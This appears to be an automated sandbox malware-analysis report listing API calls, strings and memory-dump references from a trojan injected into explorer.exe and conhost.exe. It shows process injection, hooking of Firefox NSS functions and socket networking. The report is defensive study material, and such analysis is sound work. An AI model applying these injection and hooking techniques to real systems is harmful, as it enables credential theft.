WriteProcessMemory.KERNEL32(?,?,00000000,?,00000000,01B50000,?,?,00000000,?,00000000), ref: 01B67DE0

Part of subcall function 01B633BB: HeapFree.KERNEL32(00000000,00000000,01B64BB2), ref: 01B633CE

VirtualFreeEx.KERNEL32(?,?,00000000,00008000,01B50000,?,?,00000000,?,00000000), ref: 01B67E05

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B62542, Relevance: 6.1, APIs: 4, Instructions: 87

APIs

Part of subcall function 01B67D14: IsBadReadPtr.KERNEL32(01B50000,?), ref: 01B67D30
Part of subcall function 01B67D14: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,00000000,?,00000000), ref: 01B67D4E
Part of subcall function 01B67D14: WriteProcessMemory.KERNEL32(?,?,00000000,?,00000000,01B50000,?,?,00000000,?,00000000), ref: 01B67DE0
Part of subcall function 01B67D14: VirtualFreeEx.KERNEL32(?,?,00000000,00008000,01B50000,?,?,00000000,?,00000000), ref: 01B67E05

DuplicateHandle.KERNEL32(000000FF,?,00000000,?,00000000,00000000,00000002), ref: 01B62574
WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000,?,?,?,?,01B6316D,?,00000000,?,?,00000000), ref: 01B625AB
WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000,?,?,?,?,01B6316D,?,00000000,?,?,00000000), ref: 01B625CB

Part of subcall function 01B61D15: DuplicateHandle.KERNEL32(000000FF,00000000,?,00000000,00000000,00000000,00000002), ref: 01B61D3B
Part of subcall function 01B61D15: WriteProcessMemory.KERNEL32(?,?,00000000,00000004,00000000,?,00000000,?,01B625E9,00000000,?,?,?,?,01B6316D,?), ref: 01B61D4F
Part of subcall function 01B61D15: DuplicateHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000001), ref: 01B61D69

VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000,00000000,?,00000000,?,?,?,?,01B6316D,?,00000000), ref: 01B6261A

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B6984E, Relevance: 6.1, APIs: 4, Instructions: 86

APIs

CoCreateInstance.OLE32(01B515B0,00000000,00004401,01B515A0,?), ref: 01B69874
#8.OLEAUT32(?,?,?,?,?,?,?,?,?,01B585BE,?,?), ref: 01B698C0
#2.OLEAUT32(?,?,?,?,?,?,?,?,?,01B585BE,?,?), ref: 01B698D0
#9.OLEAUT32(?,?,?,?,?,?,?,?,?,?,01B585BE,?,?), ref: 01B69909

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B69372, Relevance: 6.1, APIs: 4, Instructions: 84

APIs

Part of subcall function 01B686BF: SetFilePointerEx.KERNEL32(00000000,00000000,00000000,?,00000001), ref: 01B686D4

Part of subcall function 01B6869F: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000), ref: 01B686B1

WriteFile.KERNEL32(?,?,00000005,00000000,00000000), ref: 01B693F3
WriteFile.KERNEL32(?,00000005,00A00000,00000005,00000000), ref: 01B6940C
SetEndOfFile.KERNEL32(?,?,?,?,00000000), ref: 01B69430
FlushFileBuffers.KERNEL32(?), ref: 01B69438

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B55B28, Relevance: 6.1, APIs: 4, Instructions: 69

APIs

WaitForSingleObject.KERNEL32(?,00000000), ref: 01B55B40

Part of subcall function 01B64DCA: CloseHandle.KERNEL32(00000000), ref: 01B64DD9
Part of subcall function 01B64DCA: CloseHandle.KERNEL32(00000000), ref: 01B64DE2

Part of subcall function 01B62828: PathRenameExtensionW.SHLWAPI(?,.dat), ref: 01B628A1

ResetEvent.KERNEL32(?,?,00000000,00000044,2937498D,?,00000000,00000001), ref: 01B55B9A
WaitForSingleObject.KERNEL32(?,000003E8), ref: 01B55BD6
TerminateProcess.KERNEL32(?,00000000), ref: 01B55BE3

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B66B28, Relevance: 6.0, APIs: 4, Instructions: 42

APIs

TranslateMessage.USER32(?), ref: 01B66B4A
DispatchMessageW.USER32(?), ref: 01B66B55
PeekMessageW.USER32(00000000), ref: 01B66B65
MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 01B66B79

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B64A30, Relevance: 6.0, APIs: 4, Instructions: 36

APIs

CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 01B64A3D
Thread32First.KERNEL32(00000000,?), ref: 01B64A58
Thread32Next.KERNEL32(00000000,0000001C), ref: 01B64A6E
CloseHandle.KERNEL32(00000000), ref: 01B64A79

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B6040D, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 217

APIs

Part of subcall function 01B66973: getsockname.WS2_32(?,?,?), ref: 01B66991

Part of subcall function 01B6636E: recv.WS2_32(?,?,00000001,00000000), ref: 01B66392

getaddrinfo.WS2_32(?,00000000,00000000,?), ref: 01B604DC
freeaddrinfo.WS2_32(?,?,?,00000004), ref: 01B60515

Part of subcall function 01B664FD: socket.WS2_32(00000000,00000001,00000006), ref: 01B66506
Part of subcall function 01B664FD: bind.WS2_32(00000000,?,-0000001D), ref: 01B66526
Part of subcall function 01B664FD: listen.WS2_32(00000000,?), ref: 01B66535
Part of subcall function 01B664FD: #3.WS2_32(00000000), ref: 01B66540

Part of subcall function 01B6672E: accept.WS2_32(00000000,00000000,00000001), ref: 01B66754

Part of subcall function 01B66403: socket.WS2_32(?,00000001,00000006), ref: 01B6640C
Part of subcall function 01B66403: connect.WS2_32(00000000,?,-0000001D), ref: 01B6642C
Part of subcall function 01B66403: #3.WS2_32(00000000), ref: 01B66437

Part of subcall function 01B667B6: setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 01B667CC

Part of subcall function 01B665B7: recv.WS2_32(?,?,00000400,00000000), ref: 01B66600
Part of subcall function 01B665B7: #19.WS2_32(?,?,00000000,00000000), ref: 01B6661A
Part of subcall function 01B665B7: select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 01B66657

Part of subcall function 01B6675E: shutdown.WS2_32(?,00000002), ref: 01B66766
Part of subcall function 01B6675E: #3.WS2_32(?), ref: 01B6676D

Part of subcall function 01B60397: getpeername.WS2_32(000000FF,00000000,00000000), ref: 01B603BB
Part of subcall function 01B60397: getsockname.WS2_32(000000FF,00000000,00000000), ref: 01B603CA

Strings

Z, xrefs: 01B6064F

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B6773A, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 103

APIs

Part of subcall function 01B646F4: GetTickCount.KERNEL32(01B68766,?), ref: 01B646F4

CharUpperW.USER32(00000000), ref: 01B6785B

Strings

bcdfghklmnpqrstvwxz, xrefs: 01B67759
.exe, xrefs: 01B67745

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B6D64B, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101

APIs

PFXImportCertStore.CRYPT32(?,?,?), ref: 01B6D664

Part of subcall function 01B6262D: WaitForSingleObject.KERNEL32(00000000,01B5776D), ref: 01B62635

GetSystemTime.KERNEL32(?), ref: 01B6D6B0

Part of subcall function 01B6D42A: GetUserNameExW.SECUR32(00000002,?,00000001,?,?,?,01B6D581,?,?,00000000), ref: 01B6D43F

Part of subcall function 01B640AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 01B640CF

Strings

.txt, xrefs: 01B6D746

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B57EF9, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93

APIs

CoCreateInstance.OLE32(01B516C0,00000000,00004401,01B516D0,?), ref: 01B57F29
CoCreateInstance.OLE32(01B51690,00000000,00004401,01B516A0,?), ref: 01B57F7C

Strings

D, xrefs: 01B57FA7

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B67A14, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64

APIs

StringFromGUID2.OLE32(00000000,?,00000028), ref: 01B67AB5

Strings

Global\, xrefs: 01B67A91
Local\, xrefs: 01B67A9A

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B59C58, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56

APIs

SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?), ref: 01B59CA8

Part of subcall function 01B68AE4: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 01B68B23
Part of subcall function 01B68AE4: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 01B68B4A
Part of subcall function 01B68AE4: PathMatchSpecW.SHLWAPI(?,?), ref: 01B68B94
Part of subcall function 01B68AE4: Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 01B68BC1
Part of subcall function 01B68AE4: Sleep.KERNEL32(00000000,?,?), ref: 01B68BF1
Part of subcall function 01B68AE4: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 01B68C1F
Part of subcall function 01B68AE4: FindClose.KERNEL32(?,?,?,?,00000000), ref: 01B68C31

Part of subcall function 01B633BB: HeapFree.KERNEL32(00000000,00000000,01B64BB2), ref: 01B633CE

Strings

#, xrefs: 01B59C8C
&, xrefs: 01B59C7E

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B5A579, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56

APIs

SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?), ref: 01B5A5C9

Part of subcall function 01B68AE4: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 01B68B23
Part of subcall function 01B68AE4: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 01B68B4A
Part of subcall function 01B68AE4: PathMatchSpecW.SHLWAPI(?,?), ref: 01B68B94
Part of subcall function 01B68AE4: Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 01B68BC1
Part of subcall function 01B68AE4: Sleep.KERNEL32(00000000,?,?), ref: 01B68BF1
Part of subcall function 01B68AE4: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 01B68C1F
Part of subcall function 01B68AE4: FindClose.KERNEL32(?,?,?,?,00000000), ref: 01B68C31

Part of subcall function 01B633BB: HeapFree.KERNEL32(00000000,00000000,01B64BB2), ref: 01B633CE

Strings

&, xrefs: 01B5A59F
#, xrefs: 01B5A5AD

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B62B08, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55

APIs

GetModuleHandleW.KERNEL32(?), ref: 01B62B1F
GetProcAddress.KERNEL32(00000000,?), ref: 01B62B41

Part of subcall function 01B633BB: HeapFree.KERNEL32(00000000,00000000,01B64BB2), ref: 01B633CE

Strings

0x01D9C0A0, xrefs: 01B62B63

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B68737, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47

APIs

GetTempPathW.KERNEL32(000000F6,?), ref: 01B6874E

Part of subcall function 01B646F4: GetTickCount.KERNEL32(01B68766,?), ref: 01B646F4

Part of subcall function 01B640AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 01B640CF

Part of subcall function 01B68C40: PathCombineW.SHLWAPI(01B61F45,01B61F45,?), ref: 01B68C5F

Part of subcall function 01B6856B: CreateFileW.KERNEL32(01B64E95,40000000,00000001,00000000,00000002,00000080,00000000), ref: 01B68585
Part of subcall function 01B6856B: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 01B685A8
Part of subcall function 01B6856B: CloseHandle.KERNEL32(00000000), ref: 01B685B5

Strings

tmp, xrefs: 01B68767
%s%08x.%s, xrefs: 01B6876C

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B66F8F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45

APIs

GetTempFileNameW.KERNEL32(?,cab,00000000,?), ref: 01B66FB1

Part of subcall function 01B68716: SetFileAttributesW.KERNEL32(00000080,00000080,01B6B4CD,?), ref: 01B6871F
Part of subcall function 01B68716: DeleteFileW.KERNEL32(?), ref: 01B68729

PathFindFileNameW.SHLWAPI(?), ref: 01B66FD3

Part of subcall function 01B6353A: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,01B64232,00000000,00000000,00000000,01B63597,00000000,00000000,00000000,?,00000000), ref: 01B63555

Strings

cab, xrefs: 01B66FA6

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B6C8A1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42

APIs

Part of subcall function 01B66AAA: GetTokenInformation.KERNELBASE(?,00000001,00000000,00000000,00000000,00000000,00000000,?,?,01B649F4,?,?,?,01B62326,000000FF,01B72C08), ref: 01B66AC3
Part of subcall function 01B66AAA: GetLastError.KERNEL32(?,?,01B649F4,?,?,?,01B62326,000000FF,01B72C08,?,?,00000000), ref: 01B66AC9
Part of subcall function 01B66AAA: GetTokenInformation.KERNELBASE(?,00000001,00000000,00000000,00000000,?,?,01B649F4,?,?,?,01B62326,000000FF,01B72C08), ref: 01B66AEF

EqualSid.ADVAPI32(00000000,00000000,?,00000000,?,01B6C9FB,00000000,?,?,?), ref: 01B6C8C6

Part of subcall function 01B633BB: HeapFree.KERNEL32(00000000,00000000,01B64BB2), ref: 01B633CE

Part of subcall function 01B64CDD: LoadLibraryA.KERNEL32(userenv.dll), ref: 01B64CEE
Part of subcall function 01B64CDD: GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock,00000000,?), ref: 01B64D0D
Part of subcall function 01B64CDD: GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 01B64D19
Part of subcall function 01B64CDD: CreateProcessAsUserW.ADVAPI32(?,00000000,01B6C8F5,00000000,00000000,00000000,01B6C8F5,01B6C8F5,00000000,?,?,?,00000000,00000044), ref: 01B64D8A
Part of subcall function 01B64CDD: CloseHandle.KERNEL32(?), ref: 01B64D9D
Part of subcall function 01B64CDD: CloseHandle.KERNEL32(?), ref: 01B64DA2
Part of subcall function 01B64CDD: FreeLibrary.KERNEL32(?), ref: 01B64DB9

CloseHandle.KERNEL32(?), ref: 01B6C907

Strings

"%s", xrefs: 01B6C8DA

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B65484, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39

APIs

Part of subcall function 01B65403: LoadLibraryA.KERNEL32(urlmon.dll), ref: 01B65414
Part of subcall function 01B65403: GetProcAddress.KERNEL32(00000000,ObtainUserAgentString), ref: 01B65427
Part of subcall function 01B65403: FreeLibrary.KERNEL32(?), ref: 01B65479

GetTickCount.KERNEL32(?), ref: 01B654C9

Part of subcall function 01B652D1: WaitForSingleObject.KERNEL32(?,?), ref: 01B65325
Part of subcall function 01B652D1: Sleep.KERNEL32(?,?,?,00000000), ref: 01B65338
Part of subcall function 01B652D1: InternetCloseHandle.WININET(00000000), ref: 01B653BE

GetTickCount.KERNEL32(00000000), ref: 01B654DB

Part of subcall function 01B633BB: HeapFree.KERNEL32(00000000,00000000,01B64BB2), ref: 01B633CE

Strings

http://www.google.com/webhp, xrefs: 01B654A9

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B5A2EA, Relevance: 5.2, APIs: 4, Instructions: 197

APIs

Part of subcall function 01B68C40: PathCombineW.SHLWAPI(01B61F45,01B61F45,?), ref: 01B68C5F

Part of subcall function 01B685D0: CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000), ref: 01B685F5
Part of subcall function 01B685D0: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,01B62D27,?,?,00000000), ref: 01B68608
Part of subcall function 01B685D0: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,01B62D27,?,?,00000000), ref: 01B68630
Part of subcall function 01B685D0: ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 01B68648
Part of subcall function 01B685D0: VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,01B62D27,?,?,00000000), ref: 01B68662
Part of subcall function 01B685D0: CloseHandle.KERNEL32(?), ref: 01B6866B

StrStrIA.SHLWAPI(?,?), ref: 01B5A410
StrStrIA.SHLWAPI(?,?), ref: 01B5A422
StrStrIA.SHLWAPI(?,?), ref: 01B5A432
StrStrIA.SHLWAPI(?,?), ref: 01B5A444

Part of subcall function 01B640AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 01B640CF

Part of subcall function 01B633BB: HeapFree.KERNEL32(00000000,00000000,01B64BB2), ref: 01B633CE

Part of subcall function 01B68678: VirtualFree.KERNEL32(?,00000000,00008000,00000000,01B6C83B,?,?,.exe,00000000,00000000,?,.exe,00000006), ref: 01B68689
Part of subcall function 01B68678: CloseHandle.KERNEL32(?), ref: 01B68697

Part of subcall function 01B6338B: HeapAlloc.KERNEL32(00000008,-00000004,01B64B59,00000000,?,?,?,01B61E08,00000000,01B622ED,?,?,00000000), ref: 01B6339C

Part of subcall function 01B68AE4: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 01B68B23
Part of subcall function 01B68AE4: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 01B68B4A
Part of subcall function 01B68AE4: PathMatchSpecW.SHLWAPI(?,?), ref: 01B68B94
Part of subcall function 01B68AE4: Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 01B68BC1
Part of subcall function 01B68AE4: Sleep.KERNEL32(00000000,?,?), ref: 01B68BF1
Part of subcall function 01B68AE4: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 01B68C1F
Part of subcall function 01B68AE4: FindClose.KERNEL32(?,?,?,?,00000000), ref: 01B68C31

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B6AD5F, Relevance: 5.1, APIs: 4, Instructions: 71

APIs

EnterCriticalSection.KERNEL32(01B73FB4,?,?,?,01B6B052,?), ref: 01B6AD7C

Part of subcall function 01B633BB: HeapFree.KERNEL32(00000000,00000000,01B64BB2), ref: 01B633CE

LeaveCriticalSection.KERNEL32(01B73FB4,?,?,?,01B6B052,?), ref: 01B6AD9D
EnterCriticalSection.KERNEL32(01B73FB4,?,?,?,?,01B6B052,?), ref: 01B6ADAE

Part of subcall function 01B63346: HeapAlloc.KERNEL32(00000008,-00000003,01B636F5,?,?,00000000,01B641E1,?,01B62070,?,?,?,01B64191,?,?,?), ref: 01B63368
Part of subcall function 01B63346: HeapReAlloc.KERNEL32(00000008,00000200,-00000003,01B636F5,?,?,00000000,01B641E1,?,01B62070,?,?,?,01B64191,?,?), ref: 01B63379

LeaveCriticalSection.KERNEL32(01B73FB4,?,?,?,01B6B052,?), ref: 01B6AE47

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Analysis Process: conhost.exe PID: 1132 Parent PID: 3700

Executed Functions

Function 000C20C4, Relevance: 49.2, APIs: 17, Strings: 11, Instructions: 229

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000000), ref: 000C2105
LoadLibraryA.KERNEL32(?,LoadLibraryA,GetProcAddress,?,?,00000000), ref: 000C2172
GetProcAddress.KERNELBASE(?,?,?,?,00000000), ref: 000C21A7
GetModuleHandleW.KERNEL32(?,LoadLibraryA,GetProcAddress,?,?,00000000), ref: 000C21DB
GetProcAddress.KERNEL32(00000000,NtCreateThread,?,?,00000000), ref: 000C21FA
GetProcAddress.KERNEL32(NtCreateUserProcess,?,?,00000000), ref: 000C220C
GetProcAddress.KERNEL32(NtQueryInformationProcess,?,?,00000000), ref: 000C221E
GetProcAddress.KERNEL32(RtlUserThreadStart,?,?,00000000), ref: 000C2230
GetProcAddress.KERNEL32(LdrLoadDll,?,?,00000000), ref: 000C2242
GetProcAddress.KERNEL32(LdrGetDllHandle,?,?,00000000), ref: 000C2254
HeapCreate.KERNELBASE(00000000,00080000,00000000,?,?,00000000), ref: 000C228D
GetProcessHeap.KERNEL32(?,?,00000000), ref: 000C229C
InitializeCriticalSection.KERNEL32(000D400C,?,?,00000000), ref: 000C22C9
WSAStartup.WS2_32(00000202,?), ref: 000C22DF
CreateEventW.KERNEL32(000D2C30,00000001,00000000,00000000,?,?,00000000), ref: 000C2300

Part of subcall function 000C49D2: OpenProcessToken.ADVAPI32(?,00000008,?,76C61857,?,?,000C2326,000000FF,000D2C08,?,?,00000000), ref: 000C49E2
Part of subcall function 000C49D2: GetTokenInformation.KERNELBASE(?,0000000C,00000000,00000004,00000000,?,?,?,000C2326,000000FF,000D2C08), ref: 000C4A0E
Part of subcall function 000C49D2: CloseHandle.KERNEL32(?), ref: 000C4A23

GetLengthSid.ADVAPI32(00000000,000000FF,000D2C08,?,?,00000000), ref: 000C2335

Part of subcall function 000C1E2D: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,C:\Users\admin\AppData\Roaming), ref: 000C1E4B
Part of subcall function 000C1E2D: PathRemoveBackslashW.SHLWAPI(C:\Users\admin\AppData\Roaming), ref: 000C1E5A
Part of subcall function 000C1E2D: GetModuleFileNameW.KERNEL32(00000000,?,00000104,76C61857), ref: 000C1E6E

GetCurrentProcessId.KERNEL32(00000000,016AF7D0,00000000,?,?,00000000), ref: 000C2362

Part of subcall function 000C1E8F: IsBadReadPtr.KERNEL32(?,?), ref: 000C1EBD

Part of subcall function 000C7A14: StringFromGUID2.OLE32(00000000,?,00000028), ref: 000C7AB5

Part of subcall function 000C1F98: InitializeCriticalSection.KERNEL32(000D3FB4,00000000,76C61857,00000000), ref: 000C1FAF
Part of subcall function 000C1F98: InitializeCriticalSection.KERNEL32(000D2AC8), ref: 000C1FE4
Part of subcall function 000C1F98: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000C200C
Part of subcall function 000C1F98: ReadFile.KERNEL32(00000000,?,000001FE,000001FE,00000000), ref: 000C2029
Part of subcall function 000C1F98: CloseHandle.KERNEL32(00000000), ref: 000C203A
Part of subcall function 000C1F98: InitializeCriticalSection.KERNEL32(000D23AC), ref: 000C2081
Part of subcall function 000C1F98: GetModuleHandleW.KERNEL32(nspr4.dll), ref: 000C2093
Part of subcall function 000C1F98: GetModuleHandleW.KERNEL32(nss3.dll), ref: 000C209E

Part of subcall function 000C1EE1: SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?), ref: 000C1F2C
Part of subcall function 000C1EE1: lstrcmpiW.KERNEL32(?,?,?), ref: 000C1F56

Strings

GetProcAddress, xrefs: 000C211D
LoadLibraryA, xrefs: 000C2127
NtCreateUserProcess, xrefs: 000C21FC
Global\{A98E1C61-ACC4-103D-676C-E42BACAD1769}, xrefs: 000C23F3
{3FF5AE44-1EE1-8646-676C-E42BACAD1769}, xrefs: 000C23AB
LdrGetDllHandle, xrefs: 000C2244
SOFTWARE\Microsoft\Xyuxy, xrefs: 000C23F9
NtQueryInformationProcess, xrefs: 000C220E
RtlUserThreadStart, xrefs: 000C2220
NtCreateThread, xrefs: 000C21F4
LdrLoadDll, xrefs: 000C2232

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000C1F98, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 91

APIs

InitializeCriticalSection.KERNEL32(000D3FB4,00000000,76C61857,00000000), ref: 000C1FAF
InitializeCriticalSection.KERNEL32(000D2AC8), ref: 000C1FE4

Part of subcall function 000C2828: PathRenameExtensionW.SHLWAPI(?,.dat), ref: 000C28A1

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000C200C
ReadFile.KERNEL32(00000000,?,000001FE,000001FE,00000000), ref: 000C2029
CloseHandle.KERNEL32(00000000), ref: 000C203A

Part of subcall function 000C9D6D: InitializeCriticalSection.KERNEL32(000D3F24,00000000,7718F8FF), ref: 000C9D8F
Part of subcall function 000C9D6D: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,00000000), ref: 000C9E63

Part of subcall function 000CB4D3: GetModuleHandleW.KERNEL32(nspr4.dll,00000000,7718F8FF,00000000), ref: 000CB4F0

InitializeCriticalSection.KERNEL32(000D23AC), ref: 000C2081

Part of subcall function 000BE0FB: GetCurrentThreadId.KERNEL32(7718F8FF), ref: 000BE108
Part of subcall function 000BE0FB: GetThreadDesktop.USER32(00000000), ref: 000BE10F
Part of subcall function 000BE0FB: GetUserObjectInformationW.USER32(00000000,00000002,?,00000064,?), ref: 000BE128

GetModuleHandleW.KERNEL32(nspr4.dll), ref: 000C2093
GetModuleHandleW.KERNEL32(nss3.dll), ref: 000C209E

Part of subcall function 000BC103: GetModuleHandleW.KERNEL32(nss3.dll,00000000,76C619C1,00000000,000C20A9), ref: 000BC111
Part of subcall function 000BC103: GetProcAddress.KERNEL32(00000000,PR_OpenTCPSocket,00000000,76C619C1,00000000,000C20A9), ref: 000BC125
Part of subcall function 000BC103: GetProcAddress.KERNEL32(00000000,PR_Close), ref: 000BC132
Part of subcall function 000BC103: GetProcAddress.KERNEL32(00000000,PR_Read), ref: 000BC13F
Part of subcall function 000BC103: GetProcAddress.KERNEL32(00000000,PR_Write), ref: 000BC14C

Strings

nspr4.dll, xrefs: 000C208E
nss3.dll, xrefs: 000C2099

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

Function 000C69AA, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 57

APIs

InitializeSecurityDescriptor.ADVAPI32(000D2C3C,00000001,00000000,000C22ED,?,?,00000000), ref: 000C69B4
SetSecurityDescriptorDacl.ADVAPI32(000D2C3C,00000001,00000000,00000000,?,?,00000000), ref: 000C69C5
ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,00000000,00000000), ref: 000C69DB
GetSecurityDescriptorSacl.ADVAPI32(00000000,?,?,?,?,?,00000000), ref: 000C69F7
SetSecurityDescriptorSacl.ADVAPI32(000D2C3C,?,?,?,?,?,00000000), ref: 000C6A0B
LocalFree.KERNEL32(00000000,?,?,00000000), ref: 000C6A18

Strings

S:(ML;;NRNWNX;;;LW), xrefs: 000C69D6

Memory Dump Source

Source File: 00000006.00000002.2017600374.000B0000.00000040.sdmp, Offset: 000B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b0000_conhost.jbxd

